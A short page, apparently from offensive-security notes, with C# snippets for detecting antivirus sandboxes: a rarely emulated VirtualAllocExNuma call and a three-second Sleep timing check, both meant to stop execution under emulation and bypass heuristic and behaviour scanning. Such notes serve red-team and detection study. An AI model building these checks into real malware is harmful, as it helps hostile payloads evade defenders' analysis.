Dynamic Analysis
Sandbox Detection
Resources
#Sandbox evasion using rare-emulated API to attempt heuristics/behaviour bypass
[DllImport("kernel32.dll")]
private static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
if (mem == null)
{
Console.WriteLine("[-] VirtualAllocExNuma check failed.");
return;
}
#Sleep for 3 seconds to evade in-memory scan and checks if the emulator did not fast forward through the sleep instruction
[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
DateTime time1 = DateTime.Now;
Sleep(3000);
double time2 = DateTime.Now.Subtract(time1).TotalSeconds;
if (time2 < 2.5)
{
Console.WriteLine("[-] Sleep check failed.");
return;
}
Last updated